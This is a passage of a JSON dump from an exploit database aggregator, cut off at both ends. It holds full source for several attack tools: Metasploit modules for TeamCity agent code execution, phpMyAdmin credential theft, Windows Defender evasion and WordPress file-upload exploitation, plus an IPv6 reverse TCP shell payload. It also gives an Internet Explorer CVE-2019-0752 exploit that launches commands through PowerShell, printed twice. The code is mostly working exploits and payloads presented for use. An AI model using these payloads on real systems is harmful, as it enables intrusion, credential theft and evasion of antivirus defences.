<myBuildId>#{build_id}</myBuildId>\n <myBuildTypeId>x</myBuildTypeId>\n <myPersonal>false</myPersonal>\n <myCheckoutType>ON_AGENT</myCheckoutType>\n <myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory>\n <myServerParameters class=\"tree-map\">\n <no-comparator/>\n <entry>\n <string>system.build.number</string>\n <string>0</string>\n </entry>\n </myServerParameters>\n <myVcsRootOldRevisions class=\"tree-map\">\n <no-comparator/>\n </myVcsRootOldRevisions>\n <myVcsRootCurrentRevisions class=\"tree-map\">\n <no-comparator/>\n </myVcsRootCurrentRevisions>\n <myAccessCode/>\n <myArtifactDependencies/>\n <myBuildTypeOptions/>\n <myPersonalVcsChanges/>\n <myUserBuildParameters/>\n <myVcsChanges/>\n <myVcsRootEntries/>\n <myBuildRunners>\n <jetbrains.buildServer.agentServer.BuildRunnerData>\n <myRunType>simpleRunner</myRunType>\n <myRunnerName>x</myRunnerName>\n <myRunnerParameters class=\"tree-map\">\n <no-comparator/>\n <entry>\n <string>script.content</string>\n <string>#{script_content}</string>\n </entry>\n <entry>\n <string>use.custom.script</string>\n <string>true</string>\n </entry>\n </myRunnerParameters>\n <myServerParameters class=\"tree-map\">\n <no-comparator/>\n </myServerParameters>\n </jetbrains.buildServer.agentServer.BuildRunnerData>\n </myBuildRunners>\n </AgentBuild>\n ]]>\n </value>\n </param>\n </params>\n</methodCall>\n )\n return xml_payload.strip!\n end\n\n def req_teamcity_6(script_content)\n build_id = Rex::Text.rand_text_numeric(8)\n xml_payload = %(\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n <methodName>buildAgent.run</methodName>\n <params>\n <param>\n <value>\n <![CDATA[\n <AgentBuild>\n <myBuildId>#{build_id}</myBuildId>\n <myBuildTypeId>x</myBuildTypeId>\n <myAccessCode></myAccessCode>\n <myPersonal>false</myPersonal>\n <myCheckoutType>ON_AGENT</myCheckoutType>\n <myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory>\n <myServerParameters class=\"tree-map\">\n <no-comparator/>\n <entry>\n <string>system.build.number</string>\n <string>0</string>\n </entry>\n </myServerParameters>\n <myVcsRootOldRevisions class=\"tree-map\">\n <no-comparator/>\n </myVcsRootOldRevisions>\n <myVcsRootCurrentRevisions class=\"tree-map\">\n <no-comparator/>\n </myVcsRootCurrentRevisions>\n <myArtifactDependencies/>\n <myBuildTypeOptions/>\n <myPersonalVcsChanges/>\n <myUserBuildParameters/>\n <myVcsChanges/>\n <myVcsRootEntries/>\n <myBuildRunners>\n <jetbrains.buildServer.agentServer.BuildRunnerData>\n <myRunType>simpleRunner</myRunType>\n <myServerParameters class=\"tree-map\">\n <no-comparator/>\n </myServerParameters>\n <myRunnerParameters class=\"tree-map\">\n <no-comparator/>\n <entry>\n <string>script.content</string>\n <string>#{script_content}</string>\n </entry>\n <entry>\n <string>use.custom.script</string>\n <string>true</string>\n </entry>\n </myRunnerParameters>\n </jetbrains.buildServer.agentServer.BuildRunnerData>\n </myBuildRunners>\n </AgentBuild>\n ]]>\n </value>\n </param>\n </params>\n</methodCall>\n )\n return xml_payload.strip!\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/misc/teamcity_agent_xmlrpc_exec.rb"}, {"lastseen": "2019-11-19T17:30:26", "bulletinFamily": "exploit", "description": "This module gathers Phpmyadmin creds from target linux machine.\n", "modified": "2018-09-07T16:13:09", "published": "2018-08-19T18:10:19", "id": "MSF:POST/LINUX/GATHER/PHPMYADMIN_CREDSTEAL", "href": "", "type": "metasploit", "title": "Phpmyadmin credentials stealer", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Phpmyadmin credentials stealer\",\n 'Description' => %q{\n This module gathers Phpmyadmin creds from target linux machine.\n },\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux'],\n 'SessionTypes' => ['meterpreter'],\n 'Author' => [\n 'Chaitanya Haritash [bofheaded]',\n 'Dhiraj Mishra <dhiraj@notsosecure.com>'\n ]\n ))\n end\n\n def parse_creds(contents)\n db_user = contents.scan(/\\$dbuser\\s*=\\s*['\"](.*)['\"];/).flatten.first\n db_pass = contents.scan(/\\$dbpass\\s*=\\s*['\"](.*)['\"];/).flatten.first\n\n unless db_user && db_pass\n print_error(\"Couldn't find PhpMyAdmin credentials\")\n return\n end\n\n print_good(\"User: #{db_user}\")\n print_good(\"Password: #{db_pass}\")\n\n print_status(\"Storing credentials...\")\n store_valid_credential(user: db_user, private: db_pass)\n end\n\n def run\n print_line(\"\\nPhpMyAdmin Creds Stealer!\\n\")\n\n if session.platform.include?(\"windows\")\n print_error(\"This module is not compatible with windows\")\n return\n end\n\n conf_path = \"/etc/phpmyadmin/config-db.php\"\n unless file_exist?(conf_path)\n print_error(\"#{conf_path} doesn't exist on target\")\n return\n end\n\n print_good('PhpMyAdmin config found!')\n res = read_file(conf_path)\n unless res\n print_error(\"You may not have permissions to read the file.\")\n return\n end\n\n print_good(\"Extracting creds\")\n parse_creds(res)\n\n p = store_loot('phpmyadmin_conf', 'text/plain', session, res, 'phpmyadmin_conf.txt', 'phpmyadmin_conf')\n print_good(\"Config file located at #{p}\")\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/linux/gather/phpmyadmin_credsteal.rb"}, {"lastseen": "2019-12-09T18:28:56", "bulletinFamily": "exploit", "description": "This module allows you to generate a Windows EXE that evades against Microsoft Windows Defender. Multiple techniques such as shellcode encryption, source code obfuscation, Metasm, and anti-emulation are used to achieve this. For best results, please try to use payloads that use a more secure channel such as HTTPS or RC4 in order to avoid the payload network traffic getting caught by antivirus better.\n", "modified": "2018-10-06T21:04:07", "published": "2018-08-02T16:54:38", "id": "MSF:EVASION/WINDOWS/WINDOWS_DEFENDER_EXE", "href": "", "type": "metasploit", "title": "Microsoft Windows Defender Evasive Executable", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/compiler/windows'\n\nclass MetasploitModule < Msf::Evasion\n\n def initialize(info={})\n super(merge_info(info,\n 'Name' => 'Microsoft Windows Defender Evasive Executable',\n 'Description' => %q{\n This module allows you to generate a Windows EXE that evades against Microsoft\n Windows Defender. Multiple techniques such as shellcode encryption, source code\n obfuscation, Metasm, and anti-emulation are used to achieve this.\n\n For best results, please try to use payloads that use a more secure channel\n such as HTTPS or RC4 in order to avoid the payload network traffic getting\n caught by antivirus better.\n },\n 'Author' => [ 'sinn3r' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Targets' => [ ['Microsoft Windows', {}] ]\n ))\n end\n\n def rc4_key\n @rc4_key ||= Rex::Text.rand_text_alpha(32..64)\n end\n\n def get_payload\n @c_payload ||= lambda {\n opts = { format: 'rc4', key: rc4_key }\n junk = Rex::Text.rand_text(10..1024)\n p = payload.encoded + junk\n\n return {\n size: p.length,\n c_format: Msf::Simple::Buffer.transform(p, 'c', 'buf', opts)\n }\n }.call\n end\n\n def c_template\n @c_template ||= %Q|#include <Windows.h>\n#include <rc4.h>\n\n// The encrypted code allows us to get around static scanning\n#{get_payload[:c_format]}\n\nint main() {\n int lpBufSize = sizeof(int) * #{get_payload[:size]};\n LPVOID lpBuf = VirtualAlloc(NULL, lpBufSize, MEM_COMMIT, 0x00000040);\n memset(lpBuf, '\\\\0', lpBufSize);\n\n HANDLE proc = OpenProcess(0x1F0FFF, false, 4);\n // Checking NULL allows us to get around Real-time protection\n if (proc == NULL) {\n RC4(\"#{rc4_key}\", buf, (char*) lpBuf, #{get_payload[:size]});\n void (*func)();\n func = (void (*)()) lpBuf;\n (void)(*func)();\n }\n\n return 0;\n}|\n end\n\n def run\n vprint_line c_template\n # The randomized code allows us to generate a unique EXE\n bin = Metasploit::Framework::Compiler::Windows.compile_random_c(c_template)\n print_status(\"Compiled executable size: #{bin.length}\")\n file_create(bin)\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/evasion/windows/windows_defender_exe.rb"}, {"lastseen": "2019-11-01T19:21:29", "bulletinFamily": "exploit", "description": "This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication.\n", "modified": "2018-07-27T04:08:20", "published": "2018-07-25T16:29:47", "id": "MSF:EXPLOIT/MULTI/HTTP/WP_RESPONSIVE_THUMBNAIL_SLIDER_UPLOAD", "href": "", "type": "metasploit", "title": "WordPress Responsive Thumbnail Slider Arbitrary File Upload", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HTTP::Wordpress\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"WordPress Responsive Thumbnail Slider Arbitrary File Upload\",\n 'Description' => %q{\n This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider\n Plugin v1.0 for WordPress post authentication.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Arash Khazaei', # EDB PoC\n 'Shelby Pace' # Metasploit Module\n ],\n 'References' =>\n [\n [ 'EDB', '37998' ]\n ],\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n [ 'Responsive Thumbnail Slider Plugin v1.0', { } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Aug 28 2015\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"Base path for WordPress\", '/' ]),\n OptString.new('WPUSERNAME', [ true, \"WordPress Username to authenticate with\", 'admin' ]),\n OptString.new('WPPASSWORD', [ true, \"WordPress Password to authenticate with\", '' ])\n ])\n end\n\n def check\n # The version regex found in extract_and_check_version does not work for this plugin's\n # readme.txt, so we build a custom one.\n check_code = check_version || check_plugin_path\n if check_code\n return check_code\n else\n return CheckCode::Safe\n end\n end\n\n def check_version\n plugin_uri = normalize_uri(target_uri.path, '/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => plugin_uri\n )\n\n if res && res.body && res.body =~ /Version:([\\d\\.]+)/\n version = Gem::Version.new($1)\n if version <= Gem::Version.new('1.0')\n vprint_status(\"Plugin version found: #{version}\")\n return CheckCode::Appears\n end\n end\n\n nil\n end\n\n def check_plugin_path\n plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => plugin_uri\n )\n\n if res && res.code == 200\n vprint_status('Upload folder for wp-responsive-images-thumbnail-slider detected')\n return CheckCode::Detected\n end\n\n nil\n end\n\n def login\n auth_cookies = wordpress_login(datastore['WPUSERNAME'], datastore['WPPASSWORD'])\n return fail_with(Failure::NoAccess, \"Unable to log into WordPress\") unless auth_cookies\n\n store_valid_credential(user: datastore['WPUSERNAME'], private: datastore['WPPASSWORD'], proof: auth_cookies)\n\n print_good(\"Logged into WordPress with #{datastore['WPUSERNAME']}:#{datastore['WPPASSWORD']}\")\n auth_cookies\n end\n\n def upload_payload(cookies)\n manage_uri = 'wp-admin/admin.php?page=responsive_thumbnail_slider_image_management'\n file_payload = get_write_exec_payload(:unlink_self => true)\n file_name = \"#{rand_text_alpha(5)}.php\"\n\n # attempt to access plugins page\n plugin_res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, manage_uri),\n 'cookie' => cookies\n )\n\n unless plugin_res && plugin_res.body.include?(\"tmpl-uploader-window\")\n fail_with(Failure::NoAccess, \"Unable to reach Responsive Thumbnail Slider Plugin Page\")\n end\n\n data = Rex::MIME::Message.new\n data.add_part(file_payload, 'image/jpeg', nil, \"form-data; name=\\\"image_name\\\"; filename=\\\"#{file_name}\\\"\")\n data.add_part(file_name.split('.')[0], nil, nil, \"form-data; name=\\\"imagetitle\\\"\")\n data.add_part('Save Changes', nil, nil, \"form-data; name=\\\"btnsave\\\"\")\n post_data = data.to_s\n\n # upload the file\n upload_res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, manage_uri, '&action=addedit'),\n 'cookie' => cookies,\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n )\n\n page = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies)\n fail_with(Failure::Unknown, \"Unsure of successful upload\") unless (upload_res && page && page.body =~ /New\\s+image\\s+added\\s+successfully/)\n\n retrieve_file(page, cookies)\n end\n\n def retrieve_file(res, cookies)\n fname = res.body.scan(/slider\\/(.*\\.php)/).flatten[0]\n fail_with(Failure::BadConfig, \"Couldn't find file name\") if fname.empty? || fname.nil?\n file_uri = normalize_uri(target_uri.path, \"wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}\")\n\n print_good(\"Successful upload\")\n send_request_cgi(\n 'uri' => file_uri,\n 'method' => 'GET',\n 'cookie' => cookies\n )\n end\n\n def exploit\n unless check == CheckCode::Safe\n auth_cookies = login\n upload_payload(auth_cookies)\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb"}, {"lastseen": "2019-11-30T11:35:04", "bulletinFamily": "exploit", "description": "Connect back to attacker and spawn a command shell over IPv6\n", "modified": "2018-07-23T18:38:25", "published": "2018-06-13T19:29:09", "id": "MSF:PAYLOAD/LINUX/X86/SHELL_REVERSE_TCP_IPV6", "href": "", "type": "metasploit", "title": "Linux Command Shell, Reverse TCP Inline (IPv6)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 158\n\n include Msf::Payload::Single\n include Msf::Payload::Linux\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Linux Command Shell, Reverse TCP Inline (IPv6)',\n 'Description' => 'Connect back to attacker and spawn a command shell over IPv6',\n 'Author' => 'Matteo Malvica <matteo[at]malvica.com>',\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Session' => Msf::Sessions::CommandShellUnix\n ))\n end\n\ndef generate_stage\n # tcp port conversion\n port_order = ([1,0]) # byte ordering\n tcp_port = [datastore['LPORT'].to_i].pack('n*').unpack('H*').to_s.scan(/../) # converts user input into integer and unpacked into a string array\n tcp_port.pop # removes the first useless / from the array\n tcp_port.shift # removes the last useless / from the array\n tcp_port = (port_order.map{|x| tcp_port[x]}).join('') # reorder the array and convert it to a string.\n\n # ipv6 address conversion\n # converts user's input into ipv6 hex representation\n words = IPAddr.new(datastore['LHOST'], Socket::AF_INET6).hton.scan(/..../).map {|i| i.unpack('V').first.to_s(16)}\n payload_data =<<-EOS\n xor ebx,ebx\n mul ebx\n push 0x6\n push 0x1\n push 0xa\n mov ecx,esp\n mov al,0x66\n mov bl,0x1\n int 0x80\n mov esi,eax\n\n connect:\n xor ecx,ecx\n xor ebx,ebx\n push ebx\n push ebx\n push 0x#{words[3]}\n push 0x#{words[2]}\n push 0x#{words[1]}\n push 0x#{words[0]}\n push ebx\n push.i16 0x#{tcp_port}\n push.i16 0xa\n mov ecx, esp\n push.i8 0x1c\n push ecx\n push esi\n xor ebx,ebx\n xor eax,eax\n mov al,0x66\n mov bl,0x3\n mov ecx,esp\n int 0x80\n xor ebx,ebx\n cmp eax,ebx\n jne retry\n xor ecx,ecx\n mul ecx\n mov ebx,esi\n mov al,0x3f\n int 0x80\n xor eax,eax\n inc ecx\n mov ebx,esi\n mov al,0x3f\n int 0x80\n xor eax,eax\n inc ecx\n mov ebx,esi\n mov al,0x3f\n int 0x80\n xor edx,edx\n mul edx\n push edx\n push 0x68732f2f\n push 0x6e69622f\n mov ebx,esp\n push edx\n push ebx\n mov ecx,esp\n mov al,0xb\n int 0x80\n ret\n\n retry:\n xor ebx,ebx\n push ebx\n push.i8 0xa\n mul ebx\n mov ebx,esp\n mov al,0xa2\n int 0x80\n jmp connect\n ret\n\n exit:\n xor eax,eax\n mov al,0x1\n int 0x80\n EOS\n\n Metasm::Shellcode.assemble(Metasm::Ia32.new, payload_data).encode_string\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb"}], "packetstorm": [{"lastseen": "2019-05-29T03:40:03", "bulletinFamily": "exploit", "description": "", "modified": "2019-05-24T00:00:00", "published": "2019-05-24T00:00:00", "id": "PACKETSTORM:153078", "href": "https://packetstormsecurity.com/files/153078/Microsoft-Internet-Explorer-Windows-10-1809-17763.316-Memory-Corruption.html", "title": "Microsoft Internet Explorer Windows 10 1809 17763.316 Memory Corruption", "type": "packetstorm", "sourceData": "`<!-- Full exploit of ZDI-19-359/ZDI-CAN-7757/CVE-2019-0752 --> \n<!-- Target: Internet Explorer, Windows 10 1809 17763.316 (Feb. 2019 patch level) --> \n<!-- Vulnerability and original exploit technique by Simon Zuckerbraun (@HexKitchen), Mar. 2019 --> \n \n<!-- Tgroupcrew@gmail.com --> \n \n<!-- Demonstrates taking an arbitrary write primitive with no info leak, and using it to get --> \n<!-- all the way to RCE using no shellcode. --> \n \n<!-- Note use of CVE-2019-0768 to get VBScript to run on IE/Win10. --> \n<!-- (h/t: James Forshaw, Google Project Zero) --> \n \n<html> \n<meta http-equiv=\"x-ua-compatible\" content=\"IE=8\"> \n<meta http-equiv=\"Expires\" content=\"-1\"> \n<body> \n<div id=\"container1\" style=\"overflow:scroll; width: 10px\"> \n<div id=\"content1\" style=\"width:5000000px\"> \nContent \n</div> \n</div> \n<script language=\"VBScript.Encode\"> \nDim ar1(&h3000000) \nDim ar2(1000) \nDim gremlin \naddressOfGremlin = &h28281000 \nClass MyClass \nPrivate mValue \nPublic Property Let Value(v) \nmValue = v \nEnd Property \nPublic Default Property Get P \nP = mValue ' Where to write \nEnd Property \nEnd Class \nSub TriggerWrite(where, val) \nDim v1 \nSet v1 = document.getElementById(\"container1\") \nv1.scrollLeft = val ' Write this value (Maximum: 0x001767dd) \nDim c \nSet c = new MyClass \nc.Value = where \nSet v1.scrollLeft = c \nEnd Sub \n' Our vulnerability does not immediately give us an unrestricted \n' write (though we could manufacture one). For our purposes, the \n' following is sufficient. It writes an arbitrary DWORD to an \n' arbitrary location, and sets the subsequent 3 bytes to zero. \nSub WriteInt32With3ByteZeroTrailer(addr, val) \nTriggerWrite addr , (val) AND &hff \nTriggerWrite addr + 1, (val\\&h100) AND &hff \nTriggerWrite addr + 2, (val\\&h10000) AND &hff \nTriggerWrite addr + 3, (val\\&h1000000) AND &hff \nEnd Sub \nSub WriteAsciiStringWith4ByteZeroTrailer(addr, str) \nFor i = 0 To Len(str) - 1 \nTriggerWrite addr + i, Asc(Mid(str, i + 1, 1)) \nNext \nEnd Sub \nFunction ReadInt32(addr) \nWriteInt32With3ByteZeroTrailer addressOfGremlin + &h8, addr \nReadInt32 = ar1(gremlin) \nEnd Function \nFunction LeakAddressOfObject(obj) \nSet ar1(gremlin + 1) = obj \nLeakAddressOfObject = ReadInt32(addressOfGremlin + &h18) \nEnd Function \nSub Exploit() \n' Corrupt vt of one array element (the \"gremlin\") \nTriggerWrite addressOfGremlin, &h4003 ' VT_BYREF | VT_I4 \nFor i = ((addressOfGremlin - &h20) / &h10) Mod &h100 To UBound(ar1) Step &h100 \nIf Not IsEmpty(ar1(i)) Then \ngremlin = i \nExit For \nEnd If \nNext \n \nIf IsEmpty(gremlin) Then \nMsgBox \"Could not find gremlin\" \nExit Sub \nEnd If \n \nFor i = 0 To UBound(ar2) \nSet ar2(i) = CreateObject(\"Scripting.Dictionary\") \nNext \n \nSet dict = ar2(UBound(ar2) / 2) \naddressOfDict = LeakAddressOfObject(dict) \nvtableOfDict = ReadInt32(addressOfDict) \nscrrun = vtableOfDict - &h11fc \nkernel32 = ReadInt32(scrrun + &h1f1a4) - &h23c90 \nwinExec = kernel32 + &h5d380 \n \ndict.Exists \"dummy\" ' Make a dispatch call, just to populate pld \n' Relocate pld to ensure its address doesn't contain a null byte \npld = ReadInt32(addressOfDict + &h3c) \nfakePld = &h28281020 \nFor i = 0 To 3 - 1 \nWriteInt32With3ByteZeroTrailer fakePld + 4 * i, ReadInt32(pld + 4 * i) \nNext \n \nfakeVtable = &h28282828 ' ASCII \"((((\" \nFor i = 0 To 21 \nIf i = 12 Then ' Dictionary.Exists \nfptr = winExec \nElse \nfptr = ReadInt32(vtableOfDict + 4 * i) \nEnd If \nWriteInt32With3ByteZeroTrailer (fakeVtable + 4 * i), fptr \nNext \n \nWriteAsciiStringWith4ByteZeroTrailer addressOfDict, \"((((\\..\\PowerShell.ewe -Command \"\"<#AAAAAAAAAAAAAAAAAAAAAAAAA\" \nWriteInt32With3ByteZeroTrailer addressOfDict + &h3c, fakePld \nWriteAsciiStringWith4ByteZeroTrailer addressOfDict + &h40, \"#>$a = \"\"\"\"Start-Process cmd `\"\"\"\"\"\"/t:4f /k whoami /user`\"\"\"\"\"\"\"\"\"\"\"\" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))\"\"\" \n \nOn Error Resume Next \ndict.Exists \"dummy\" ' Wheeee!! \n \n' A little cleanup to help prevent crashes after the exploit \nFor i = 1 To 3 \nWriteInt32With3ByteZeroTrailer addressOfDict + &h48 * i, vtableOfDict \nWriteInt32With3ByteZeroTrailer addressOfDict + (&h48 * i) + &h14, 2 \nNext \nErase Dict \nErase ar2 \nEnd Sub \nExploit \n</script> \n</body> \n</html> \n`\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/153078/msiew10se-corrupt.txt"}], "zdt": [{"lastseen": "2019-05-24T23:55:27", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2019-05-24T00:00:00", "published": "2019-05-24T00:00:00", "id": "1337DAY-ID-32801", "href": "https://0day.today/exploit/description/32801", "title": "Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption Exploit", "type": "zdt", "sourceData": "<!-- Full exploit of ZDI-19-359/ZDI-CAN-7757/CVE-2019-0752 -->\r\n<!-- Target: Internet Explorer, Windows 10 1809 17763.316 (Feb. 2019 patch level) -->\r\n<!-- Vulnerability and original exploit technique by Simon Zuckerbraun (@HexKitchen), Mar. 2019 -->\r\n\r\n<!-- [email\u00a0protected] -->\r\n\r\n<!-- Demonstrates taking an arbitrary write primitive with no info leak, and using it to get -->\r\n<!-- all the way to RCE using no shellcode. -->\r\n\r\n<!-- Note use of CVE-2019-0768 to get VBScript to run on IE/Win10. -->\r\n<!-- (h/t: James Forshaw, Google Project Zero) -->\r\n\r\n<html>\r\n<meta http-equiv=\"x-ua-compatible\" content=\"IE=8\">\r\n<meta http-equiv=\"Expires\" content=\"-1\">\r\n<body>\r\n\t<div id=\"container1\" style=\"overflow:scroll; width: 10px\">\r\n\t\t<div id=\"content1\" style=\"width:5000000px\">\r\n\t\t\tContent\r\n\t\t</div>\r\n\t</div>\r\n<script language=\"VBScript.Encode\">\r\nDim ar1(&h3000000)\r\nDim ar2(1000)\r\nDim gremlin\r\naddressOfGremlin = &h28281000\r\nClass MyClass\r\n\tPrivate mValue\r\n\tPublic Property Let Value(v)\r\n\t\tmValue = v\r\n\tEnd Property\r\n\tPublic Default Property Get P\r\n\t\tP = mValue\t\t\t\t' Where to write\r\n\tEnd Property\r\nEnd Class\r\nSub TriggerWrite(where, val)\r\n\tDim v1\r\n\tSet v1 = document.getElementById(\"container1\")\r\n\tv1.scrollLeft = val\t\t' Write this value (Maximum: 0x001767dd)\r\n\tDim c\r\n\tSet c = new MyClass\r\n\tc.Value = where\r\n\tSet v1.scrollLeft = c\r\nEnd Sub\r\n' Our vulnerability does not immediately give us an unrestricted\r\n' write (though we could manufacture one). For our purposes, the\r\n' following is sufficient. It writes an arbitrary DWORD to an\r\n' arbitrary location, and sets the subsequent 3 bytes to zero.\r\nSub WriteInt32With3ByteZeroTrailer(addr, val)\r\n\tTriggerWrite addr , (val) AND &hff\r\n\tTriggerWrite addr + 1, (val\\&h100) AND &hff\r\n\tTriggerWrite addr + 2, (val\\&h10000) AND &hff\r\n\tTriggerWrite addr + 3, (val\\&h1000000) AND &hff\r\nEnd Sub\r\nSub WriteAsciiStringWith4ByteZeroTrailer(addr, str)\r\n\tFor i = 0 To Len(str) - 1\r\n\t\tTriggerWrite addr + i, Asc(Mid(str, i + 1, 1))\r\n\tNext\r\nEnd Sub\r\nFunction ReadInt32(addr)\r\n\tWriteInt32With3ByteZeroTrailer addressOfGremlin + &h8, addr\r\n\tReadInt32 = ar1(gremlin)\r\nEnd Function\r\nFunction LeakAddressOfObject(obj)\r\n\tSet ar1(gremlin + 1) = obj\r\n\tLeakAddressOfObject = ReadInt32(addressOfGremlin + &h18)\r\nEnd Function\r\nSub Exploit()\r\n\t' Corrupt vt of one array element (the \"gremlin\")\r\n\tTriggerWrite addressOfGremlin, &h4003\t' VT_BYREF | VT_I4\r\n\tFor i = ((addressOfGremlin - &h20) / &h10) Mod &h100 To UBound(ar1) Step &h100\r\n\t\tIf Not IsEmpty(ar1(i)) Then\r\n\t\t\tgremlin = i\r\n\t\t\tExit For\r\n\t\tEnd If\r\n\tNext\r\n\t\r\n\tIf IsEmpty(gremlin) Then\r\n\t\tMsgBox \"Could not find gremlin\"\r\n\t\tExit Sub\r\n\tEnd If\r\n\t\r\n\tFor i = 0 To UBound(ar2)\r\n\t\tSet ar2(i) = CreateObject(\"Scripting.Dictionary\")\r\n\tNext\r\n\t\r\n\tSet dict = ar2(UBound(ar2) / 2)\r\n\taddressOfDict = LeakAddressOfObject(dict)\r\n\tvtableOfDict = ReadInt32(addressOfDict)\r\n\tscrrun = vtableOfDict - &h11fc\r\n\tkernel32 = ReadInt32(scrrun + &h1f1a4) - &h23c90\r\n\twinExec = kernel32 + &h5d380\r\n\t\r\n\tdict.Exists \"dummy\"\t\t' Make a dispatch call, just to populate pld\r\n\t' Relocate pld to ensure its address doesn't contain a null byte\r\n\tpld = ReadInt32(addressOfDict + &h3c)\r\n\tfakePld = &h28281020\r\n\tFor i = 0 To 3 - 1\r\n\t\tWriteInt32With3ByteZeroTrailer fakePld + 4 * i, ReadInt32(pld + 4 * i)\r\n\tNext\r\n\t\r\n\tfakeVtable = &h28282828\t\t' ASCII \"((((\"\r\n\tFor i = 0 To 21\r\n\t\tIf i = 12 Then\t\t' Dictionary.Exists\r\n\t\t\tfptr = winExec\r\n\t\tElse\r\n\t\t\tfptr = ReadInt32(vtableOfDict + 4 * i)\r\n\t\tEnd If\r\n\t\tWriteInt32With3ByteZeroTrailer (fakeVtable + 4 * i), fptr\r\n\tNext\r\n\t\r\n\tWriteAsciiStringWith4ByteZeroTrailer addressOfDict, \"((((\\..\\PowerShell.ewe -Command \"\"<#AAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n\tWriteInt32With3ByteZeroTrailer addressOfDict + &h3c, fakePld\r\n\tWriteAsciiStringWith4ByteZeroTrailer addressOfDict + &h40, \"#>$a = \"\"\"\"Start-Process cmd `\"\"\"\"\"\"/t:4f /k whoami /user`\"\"\"\"\"\"\"\"\"\"\"\" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))\"\"\"\r\n\t\r\n\tOn Error Resume Next\r\n\tdict.Exists \"dummy\"\t\t' Wheeee!!\r\n\t\r\n\t' A little cleanup to help prevent crashes after the exploit\r\n\tFor i = 1 To 3\r\n\t\tWriteInt32With3ByteZeroTrailer addressOfDict + &h48 * i, vtableOfDict\r\n\t\tWriteInt32With3ByteZeroTrailer addressOfDict + (&h48 * i) + &h14, 2\r\n\tNext\r\n\tErase Dict\r\n\tErase ar2\r\nEnd Sub\r\nExploit\r\n</script>\r\n</body>\r\n</html>\n\n# 0day.today [2019-05-24] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32801"}, {"lastseen": "2019-05-04T03:50:52", "bulletinFamily": "exploit", "description": "Exploit for linux/x86 platform in category shellcode", "modified": "2019-05-03T00:00:00", "published": "2019-05-03T00:00:00", "id": "1337DAY-ID-32652", "href": "https://0day.today/exploit/description/32652", "title": "Linux/x86 - Reverse Shell Shellcode (91 Bytes) + Python Wrapper", "type": "zdt", "sourceData": "# Exploit Title: Linux/x86 - Reverse Shell Shellcode (91 Bytes) + Python Wrapper\r\n# Exploit Author: Dave Sully \r\n# Vendor Homepage: \r\n# Software Link: NA\r\n# Version: NA\r\n# Tested on: Ubuntu 16.04\r\n# CVE : NA\r\n \r\n#######################################################################\r\n#######################################################################\r\n \r\n# This is the raw assembly 